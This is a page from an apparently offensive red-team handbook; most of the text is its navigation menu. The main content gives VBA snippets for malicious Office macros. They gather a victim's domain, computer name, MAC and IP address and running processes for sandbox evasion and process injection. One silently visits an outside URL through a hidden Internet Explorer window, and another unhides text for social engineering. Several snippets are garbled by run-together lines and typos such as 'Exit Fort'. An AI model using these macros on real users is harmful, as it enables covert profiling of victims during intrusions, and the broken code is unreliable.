The Red Team Vade Mecum
  • The Red Team Vade Mecum
  • Techniques
    • Defense Evasion
      • Binary Properties and Code Signing
      • ATA/ATP
        • Important Note
        • Intro
        • Lateral Movement
        • Domain Dominance
        • Identification
        • Recon
        • Blocking/Disabling Telemetry
          • Trusted Installer
      • Tips and Tricks
      • Basics
        • IOCs
          • High Level Overview of EDR technologies
        • Sandbox Evasion
        • Obfuscating Imports
          • Bootstrapping
        • Encrypting Strings
      • Disabling/Patching Telemetry
        • ETW Bypasses
        • AMSI Bypasses
      • Minimization
        • Commands to Avoid
        • Pivoting
        • Benefits of Using APIs
        • Thread-less Payload Execution
        • DLL Hollowing
      • Misdirection
        • Command Line Argument Spoofing
        • PPID Spoofing via CreateProcess
        • Switching Parents
          • Dechaining via WMI
      • Hiding our Payloads
        • Event Logs
        • File metadata
        • Registry Keys
        • ADS
      • IPC For Evasion and Control
    • Privilege Escalation
      • Hunting For Passwords
      • To System
        • New Service
        • Named Pipe Impersonation
        • Local Exploits
        • AlwaysInstallElevated
      • Hijacking Execution
        • Environment Variable interception
        • DLL Hijacking
      • Insecure Permissions
        • Missing Services and Tasks
        • Misconfigured Registry Hives
        • Insecure Binary Path
        • Unquoted Service Paths
    • Enumeration
      • Situational Awareness
      • Recon Commands
        • .NET AD Enum commands
        • WMIC commands
          • WMI queries from c++
    • Execution
      • Cool ways of Calling a Process
      • One Liners
    • Initial Access
      • Tips and Tricks
      • Tools
      • Staging/Stagers
      • MS Office
        • Macros
          • Evasion
            • VBA Stomping
            • Revert To Legacy Warning in Excel
            • Sandbox Evasion
          • Info Extraction
          • Inline Shapes
          • .MAM Files
          • PowerPoint
          • ACCDE
          • Shellcode Execution
          • Info Extraction
          • Dechaining Macros
        • Field Abuse
        • DDE
      • Payload Delivery
      • File Formats
        • MSG
        • RTF
        • REG
        • BAT
        • MSI Files
        • IQY
        • CHM
        • LNK
          • Using LNK to Automatically Download Payloads
        • HTA
    • Lateral Movement
      • Linux
        • SSH Hijacking
        • RDP
        • Impacket
      • No Admin?
      • Checking for access
      • Poison Handler
      • WinRM
      • AT
      • PsExec
      • WMI
      • Service Control
      • DCOM
      • RDP
      • SCShell
    • Code Injection
      • Hooking
        • Detours
      • CreateRemoteThread
      • DLL Injection
      • APC Queue Code Injection
      • Early Bird Injection
    • Persistence
      • Scheduled Tasks
        • AT
      • MS Office
      • SQL
      • Admin Level
        • SSP
        • Services
        • Default File Extension
        • AppCert DLLs
        • Time Provider
        • Waitfor
        • WinLogon
        • Netsh Dlls
        • RDP Backdoors
        • AppInit Dlls
        • Port Monitor
        • WMI Event Subscriptions
      • User Level
        • LNK
        • Startup Folder
        • Junction folders
        • Registry Keys
        • Logon Scripts
        • Powershell Profiles
        • Screen Savers
  • Infrastructure
    • SQL
      • MS SQL
        • Basics
        • Finding Sql Servers
        • Privilege Escalation
        • Post Exploitation
  • Other
    • Vulnerability Discovery
      • Web Vulnerabilities
        • Code Grepping
          • PHP Cheatsheet
    • Windows Internals
      • Unorganized Notes
Powered by GitBook
On this page

Was this helpful?

  1. Techniques
  2. Initial Access
  3. MS Office
  4. Macros

Info Extraction

This is how we will extract information with Macros. These can be used to evade sandboxes, or to just gather information about the user.

Extracting Domain/Computer name.

Set wshNetwork = CreateObject("Wscript.Network")
strUserDomain = wshNetwork.UserDomain
strCompName = wshNetwork.computername

Extracting MAC/IP

set cItems = objWMIService.ExecQuery("SELECT * FROM Win32_NetworkAdapterConfiguration WHERE IPENabled = True")
For Each oItem In cItems
  If Not IsNull(oItem.IPAddress) Then myMacAddress = oItem.macAddress
  Exit Fort
Nextset objProcessSet = objWMIService.ExecQuery("Select Name, ProcessID FROM Win32_Process")
For Each Process In objProcessSet
  ProcessStr = ProcessStr & Process.Properties_("Name").Value & ":" & Process.Properties_("ProcessId").Value & "|"Next

Visit URL

Dim objIE As Object
Set objIE = CreateObject("InternetExplorer.Application")
With objIE
  .Visible = False
  .Navigate "https://www.silentbreaksecurity.com"
  Do While .ReadyState <> 4: DoEvents: Loop
  .Quit
End With

Unhides all text(for social engineering purposes)

Selection.WholeStory
With Selection.Font
.Hidden = False
End With

Get a Process List(For Process Injection)

Dim Service, List As Object
Set Service = GetObject("winmgmts:\\.\root\cimv2")Set List = Service.ExecQuery ("SELECT * FROM Win32_Process")Dim result As String
Dim Process As Object
For Each Process In List
  If Len(Process.ExecutablePath) > 0 Then
    result = result & Process.ExecutablePath & vbNewLine
  ElseIf Len(Process.name) > 0 Then
    result = result & Process.name & vbNewLine
  End If
Next
PreviousSandbox EvasionNextInline Shapes

Last updated 3 years ago

Was this helpful?